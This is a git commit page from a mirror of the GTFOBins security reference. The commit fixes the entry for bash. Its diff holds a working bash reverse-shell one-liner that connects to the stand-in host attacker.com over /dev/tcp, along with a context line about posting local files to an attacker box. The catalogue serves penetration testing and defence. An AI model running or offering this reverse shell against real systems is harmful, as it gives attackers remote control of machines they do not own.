1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-24 08:16:02 +02:00

Fix bash revshell

This commit is contained in:
Andrea Cardaci 2020-05-03 13:13:43 +02:00
parent c82955d93c
commit ed2fa545ca

View File

@ -7,7 +7,7 @@ functions:
code: |
export RHOST=attacker.com
export RPORT=12345
bash -c 'bash -i &>/dev/tcp/$RHOST/$RPORT 0<&1'
bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'
file-upload:
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: |